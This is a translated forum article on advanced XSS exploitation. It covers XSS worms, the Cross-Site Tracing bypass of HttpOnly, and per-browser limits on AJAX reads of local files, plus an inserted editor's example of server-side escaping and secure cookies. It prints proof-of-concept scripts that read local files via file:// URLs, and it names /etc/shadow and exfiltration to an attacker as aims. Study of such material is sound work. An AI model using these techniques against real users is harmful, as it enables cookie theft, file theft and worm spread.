Summary of advanced XSS usage: XSS worms, HttpOnly, AJAX local file operations, image web pages


By racle@tian6.com
http://bbs.tian6.com/thread-12711-1-1.html
Repost Copyright

 

------------------------------------------- Preface ---------------------------------------------------------


This article assumes you already know how to insert XSS statements without errors, how XSS filtering works and how it is bypassed, and what CSRF is; in other words, you need a certain level of XSS knowledge to understand it.


If you do not have basic XSS knowledge, read the following first:
JavaScript: http://www.lib.tsinghua.edu.cn/chinese/INTERNET/JavaScript/
XSS statement collection: http://www.google.com/search?q=XSS+%D3%EF%BE%E4
XSS statement bypass: http://www.google.com/search?q=XSS+%C8%C6%B9%FD
Flash CSRF: http://www.80vul.com/dzvul/sodb/03/sodb-2008-03.txt
Breaking through the limit on the number of XSS characters to execute arbitrary JS code: http://bbs.tian6.com/thread-12239-1-1.html
Using a window reference vulnerability together with an XSS vulnerability to hijack the browser: http://bbs.tian6.com/thread-12241-1-1.html

 


If the content of this article seems strange, hard to understand, or dull to you, it means you still know little about XSS.

We hope that Tianyang members will truly learn and master every security technique in the spirit of technical study. So if you came to Tianyang because you want to learn something, calm down, understand it, see through it, and test it; your command of XSS will naturally improve a great deal.

If you think XSS is insignificant, that it is just a common pop-up window, that its scope is narrow, or that its impact is negligible, take a look at the following incidents:

Twitter suffered six XSS worms.

The Baidu XSS worm infected more than 8700 blogs, drawing wide media coverage and attention.

QQ Zone was also hit by an XSS worm.

The MySpace XSS worm infected 1 million users within 20 hours, paralysing MySpace.

..........
---------------------------------------- Introduction -------------------------------------------------------------

What is XSS? XSS, also written CSS (Cross Site Script), is a cross-site scripting attack. A malicious attacker inserts malicious HTML code into a web page; when a user browses that page, the HTML code embedded in it is executed, achieving the attacker's particular purpose. XSS is a passive attack, and because it is passive and not easy to exploit, many people often overlook how harmful it is.

 

There are many methods of cross-site attack. HTML allows simple interaction through scripts, and an intruder can insert a piece of malicious HTML code into a page by technical means, for example to record the user information the forum stores in the cookie. Because the cookie holds complete user name and password information, the user suffers a security loss. Of course, attackers also sometimes add parameters to a web page that reference .js or .vbs files, and we are attacked as soon as we browse it.

 

We will not discuss here how to find XSS, how to bypass the various restrictions, or how to execute XSS code without errors; there are many articles about that on the Internet.
XSS has now replaced SQL injection as the number one web security issue and has become an important subject of web security.
Here we will focus on the following questions:

1. What can we achieve through XSS?

2. How does HttpOnly protect cookies, how can HttpOnly be broken through, and how is that remedied?

3. The feasibility of advanced XSS exploitation and of a comprehensive, advanced XSS worm.

4. How can XSS vulnerabilities be avoided on the output and input side?

 

------------------------------------------ Study subject ----------------------------------------------------------

 

What can we achieve through XSS? Through XSS we can obtain the user's cookies and other information, simulate HTTP submissions as the user, read local client files, and carry out social-engineering deception. Combining these capabilities, we can also write comprehensive advanced worms.
Advanced XSS exploitation and comprehensive advanced XSS worms: we mainly discuss the restrictions on XSS in different browsers, XSS screenshots, image web pages, HttpOnly bypass (Cross-Site Tracing, XST), and writing our own advanced XSS worm.
Avoiding XSS vulnerabilities on the output and input side:
1: Classify the site's dynamic pages by security level into key areas and secondary key areas, and apply different input restrictions to each level.
2: Strictly control the input type: numbers, characters, or a special format, as required.
3: Escape HTML special characters at browser output; htmlspecialchars and htmlentities are commonly used. However, filtering special characters does not by itself mean security: many bypass methods defeat pure filtering, such as URL encoding, octal and hexadecimal encoding, String.fromCharCode encoding, UBB bypass, and so on. Therefore every dynamic input must be audited in the code.
4: HttpOnly can be used as one of the methods of protecting cookies.
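The four points above are the defensive half of the article, so here is an added example of what they look like in server code. This is the editor's own illustration, not code from the original post: it assumes a Node.js application, and the function names (escapeHtml, escapeForJsString, parseUserId, buildSessionCookie, renderProfile) are the editor's choices. It shows point 2 (an allowlist on the input type), point 3 (escaping at output time, in the HTML context and, separately, in the inline-script context, so that encoding tricks aimed at a blocklist have nothing to bypass) and point 4 (a cookie set with HttpOnly, so document.cookie cannot read it).

```javascript
// Added example (editor's code, not from the original post). Assumes Node.js.

// Point 3, HTML context: replace every character that means something to the
// HTML parser. Untrusted text is escaped when it is written into the page,
// never "cleaned" on input, so there is no filter for encoded payloads to slip past.
function escapeHtml(untrusted) {
  var map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '/': '&#x2F;' };
  return String(untrusted).replace(/[&<>"'\/]/g, function (ch) { return map[ch]; });
}

// Point 3, inline-script context: HTML escaping is not enough inside a
// <script> block, so everything outside a small allowlist becomes a \uXXXX
// escape. A quote or "</script>" in the value can then never leave the string.
// (charCodeAt works on UTF-16 code units, which is exactly what \u escapes need.)
function escapeForJsString(untrusted) {
  return String(untrusted).replace(/[^A-Za-z0-9,._ ]/g, function (ch) {
    return '\\u' + ('0000' + ch.charCodeAt(0).toString(16)).slice(-4);
  });
}

// Point 2: an identifier must be a number, so accept only a number (no leading
// zeros, bounded length) and reject everything else before it reaches any query.
function parseUserId(raw) {
  if (typeof raw !== 'string' || !/^[1-9][0-9]{0,9}$/.test(raw)) {
    return null;
  }
  return parseInt(raw, 10);
}

// Point 4: the Set-Cookie value for a session. HttpOnly keeps the cookie out of
// document.cookie, Secure keeps it off plain HTTP, SameSite=Lax blunts CSRF.
// The token is validated so a crafted value cannot append cookie attributes.
function buildSessionCookie(sessionId) {
  if (!/^[A-Za-z0-9_-]{16,128}$/.test(sessionId)) {
    throw new Error('invalid session id');
  }
  return 'sid=' + sessionId + '; Path=/; HttpOnly; Secure; SameSite=Lax';
}

// A profile fragment that uses the right escaper for each output context.
function renderProfile(name, bio) {
  return '<h1>' + escapeHtml(name) + '</h1>\n' +
         '<p class="bio">' + escapeHtml(bio) + '</p>\n' +
         '<script>var displayName = "' + escapeForJsString(name) + '";</script>';
}

// Constructed sample input: a classic probe string as a user-supplied name.
var sampleName = '<script>alert(1)</script>';
console.log(renderProfile(sampleName, 'Tom & "Jerry"'));
console.log(buildSessionCookie('abcdefghijklmnop0123'));
```

The cookie line is the remedy for question 2 above: with HttpOnly set, a script that runs in the page still cannot read the session cookie, which is why the article turns to Cross-Site Tracing (XST) as a bypass; that path is closed by disabling the TRACE method on the web server.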

 

 

(I) Local file operation permissions of AJAX in different browsers (reading local cookies, common sensitive files such as FTP INI files and /etc/shadow, the sensitive files of various third-party applications, and feeding the content back to the attacker):

We can refer to two articles, one by "emptiness" and the xeye team's statistics:

1: IE6 can read local files without restriction. IE8 and the Trident-based browsers of the corresponding version restrict the permissions of locally executed AJAX; it seems MS attaches great importance to security risks of this kind in IE. (This has some problems and will be corrected later!)

2: Firefox 3.0.8 and earlier allow locally executed AJAX to access files in the current directory; other directories cannot be accessed.

3: Opera 9.64 and earlier allow access by giving the file URL with the file:// protocol. If the file is in the current directory, the file:// protocol need not be specified; if the file is on the same drive letter, it can be reached by directory traversal such as ../../boot.ini.

4: WebKit-based browsers (Google Chrome, Maxthon 3.0, Safari and others) place no access restrictions at all on local AJAX.
IE6: using AJAX to read a local file

<script>
function $(x) { return document.getElementById(x); }

// Returns an XMLHttpRequest object, falling back to the ActiveX
// versions shipped with older Internet Explorer releases.
function ajax_obj() {
    var request = false;
    if (window.XMLHttpRequest) {
        request = new XMLHttpRequest();
    } else if (window.ActiveXObject) {
        var versions = ["Microsoft.XMLHTTP", "MSXML.XMLHTTP", "Microsoft.XMLHTTP",
                        "Msxml2.XMLHTTP.7.0", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.5.0",
                        "Msxml2.XMLHTTP.4.0", "MSXML2.XMLHTTP.3.0", "MSXML2.XMLHTTP"];
        for (var i = 0; i < versions.length; i++) {
            try {
                request = new ActiveXObject(versions[i]);
                break; // stop at the first version this browser supports
            } catch (e) {}
        }
    }
    return request;
}

var _x = ajax_obj();

// Synchronous request helper: _m is the HTTP method, action the URL,
// argv the request body (null for GET). Returns the response text.
function _7or3(_m, action, argv) {
    _x.open(_m, action, false);
    if (_m == "POST") _x.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    _x.send(argv);
    return _x.responseText;
}

// IE6 lets a page fetch a file: URL through XMLHttpRequest, so the
// contents of C:\11.txt end up in the page's script.
var txt = _7or3("GET", "file://localhost/C:/11.txt", null);
alert(txt);
</script>
Firefox 3: using AJAX to read local files. Only files in the same directory and its subdirectories can be read.

<script>
function $(x) { return document.getElementById(x); }

// Same XMLHttpRequest factory as in the IE6 listing above.
function ajax_obj() {
    var request = false;
    if (window.XMLHttpRequest) {
        request = new XMLHttpRequest();
    } else if (window.ActiveXObject) {
        var versions = ["Microsoft.XMLHTTP", "MSXML.XMLHTTP", "Microsoft.XMLHTTP",
                        "Msxml2.XMLHTTP.7.0", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.5.0",
// (the rest of this listing is cut off in the source)
